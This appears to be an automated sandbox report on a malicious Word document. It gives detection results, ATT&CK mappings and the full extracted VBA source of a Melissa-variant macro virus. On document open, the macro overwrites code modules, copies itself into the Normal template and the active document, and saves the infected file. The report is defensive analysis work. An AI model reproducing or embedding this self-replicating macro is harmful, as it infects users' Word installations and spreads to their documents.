Verdict: MALICIOUS
Risk score: 180

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to copy itself into the Normal template and the active document, a common technique for establishing persistence or enabling further malicious actions. The presence of ClamAV detections for 'Doc.Trojan.Assilem-2' and 'Doc.Trojan.Venom-1' strongly indicates malicious intent, likely related to malware distribution.
Heuristics (3)
- ClamAV: Doc.Trojan.Assilem-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Assilem-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6878 bytes |

SHA-256: 1643934f464e99a87689354b1051942cb2317ad3ce659075af7ad6bcd249c7ca

Detection: ClamAV: Doc.Trojan.Venom-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
''Works in both Word 2000 and Word 97
''Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
' Processing file: /opt/analyzer/scan_staging/43cc9ca65f344e2f89308c93286d8b50.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Melissa - 3652 bytes
```